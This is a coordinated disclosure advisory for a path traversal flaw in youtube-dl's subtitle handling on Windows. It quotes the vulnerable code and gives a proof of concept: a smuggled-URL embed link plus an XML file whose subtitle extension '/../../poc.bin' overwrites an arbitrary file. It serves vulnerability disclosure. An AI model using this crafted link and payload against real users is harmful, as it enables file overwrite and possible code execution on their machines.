Coordinated Disclosure Timeline

Summary

youtube-dl doesn’t validate the subtitle extension name, which makes its Windows users vulnerable to path traversal and allows for arbitrary binary file overwrite when downloading a video with subtitles from a crafted link.

Project

youtube-dl

Tested Version

The nightly v2024.05.16 and the last official v2021.12.17.

Details

Path traversal saving subtitles (GHSL-2024-089)

youtube-dl is capable of downloading not only video files, but also accompanying subtitles if the user specifies the --write-sub, --write-auto-sub, or --all-subs option. Each supported video website has a dedicated extractor. Some extractors provide only urls of subtitles and youtube-dl resolves their extension from the url path. Others provide the urls and the subtitle extensions explicitly. In turn, some of the latter extractors validate the extracted subtitle extension, but others trust the extracted value blindly. youtube-dl honors the provided extension name and uses it to build the name of the output file for subtitles in [1]. The filename is the generated name for the video file, sub_lang is en by default, sub_format is the extracted subtitles extension and info_dict.get('ext') contains the video file extension to replace with the sub_format in subtitles_filename. The subtitle is written as a binary file in [2]. The encodeFilename is just a wrapper for Unicode support that does nothing in Python 3. If the user doesn’t override the default output file template %(title)s-%(id)s.%(ext)s, then the sub_filename is formatted as %(title)s-%(id)s.%(sub_lang).%(sub_format)s. The path traversal injection in sub_format doesn’t work on Linux because Linux doesn’t accept paths like not_existing_folder/../../file. But it does work on Windows.

        if subtitles_are_requested and info_dict.get('requested_subtitles'):
            # subtitles download errors are already managed as troubles in relevant IE
            # that way it will silently go on when used with unsupporting IE
            subtitles = info_dict['requested_subtitles']
            ie = self.get_info_extractor(info_dict['extractor_key'])
            for sub_lang, sub_info in subtitles.items():
                sub_format = sub_info['ext']
                sub_filename = subtitles_filename(filename, sub_lang, sub_format, info_dict.get('ext')) # <------------- [1]
                if self.params.get('nooverwrites', False) and os.path.exists(encodeFilename(sub_filename)):
                    self.to_screen('[info] Video subtitle %s.%s is already present' % (sub_lang, sub_format))
                else:
                    self.to_screen('[info] Writing video subtitles to: ' + sub_filename)
                    if sub_info.get('data') is not None:
#...
                    else:
                        try:
                            sub_data = ie._request_webpage(
                                sub_info['url'], info_dict['id'], note=False).read()
                            with open(encodeFilename(sub_filename), 'wb') as subfile: # <------------- [2]
                                subfile.write(sub_data)
                        except (ExtractorError, IOError, OSError, ValueError) as err:
                            self.report_warning('Unable to download subtitle for "%s": %s' %
                                                (sub_lang, error_to_compat_str(err)))
                            continue

Exploitability and Proof of Concept (PoC)

Intentionally crafted subtitle extension names in a supported website (such as youtube.com or bbc.co.uk) are not in the threat model of the report. However it is possible that the websites may be compromised at some moment of time. An XSS or SQL injection would allow the attacker to exploit a specific youtube-dl extractor. Then the attacker would need to wait for any youtube-dl user or trick a specific youtube-dl user to download the video with subtitles. However other youtube-dl features allow exploitation without compromising the video hosting website:

  1. URL smuggling. Some youtube-dl extractors attempt to get additional information from the URL part that comes after # - the fragment. The fragment is URL decoded and parsed as JSON. The extractor for Microsoft Virtual Academy, for example, parses the fragment [1] and retrieves base_url from it [2] and then downloads an XML file from that URL [3]. The subtitle extension is extracted from the XML file. If a user is tricked to run, for example, youtube-dl --write-sub https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D it will use an XML file from an attacker controlled site, site.com in this case, to extract subtitles and video files.
         url, smuggled_data = unsmuggle_url(url, {}) <------------- [1]
    
         mobj = re.match(self._VALID_URL, url)
         course_id = mobj.group('course_id')
         video_id = mobj.group('id')
    
         base_url = smuggled_data.get('base_url') or self._extract_base_url(course_id, video_id) <------------- [2]
    
         settings = self._download_xml(
             '%s/content/content_%s/videosettings.xml?v=1' % (base_url, video_id), <------------- [3]
             video_id, 'Downloading video settings XML')
    
  2. Generic extractor. youtube-dl allows you to download videos from arbitrary pages that embed supported video websites. This allows the attacker to hide the smuggled fragment from a youtube-dl user. The user needs to run only youtube-dl --write-sub https://attacker.com/poc.html

For a PoC:

<class="embedly-card" href="https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2F127.0.0.1%3A8000%22%7D">
<videoSettings version="1.5">
  <PlaylistItems>
    <PlaylistItem>
      <MediaSources videoType="progressive"><MediaSource videoMode="720p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="true">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_high.mp4</MediaSource><MediaSource videoMode="540p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_mid.mp4</MediaSource><MediaSource videoMode="360p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">https://sec.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01.mp4</MediaSource></MediaSources>
      <MediaSource />
      <Title>01 | Introduction</Title>
      <MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
      <ThumbSource />
    </PlaylistItem>
  </PlaylistItems>
</videoSettings>

Impact

This issue may lead to unauthorized file system modification and later may lead to remote code execution if an executable file is overwritten.

CVE

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-089 in any communication regarding this issue.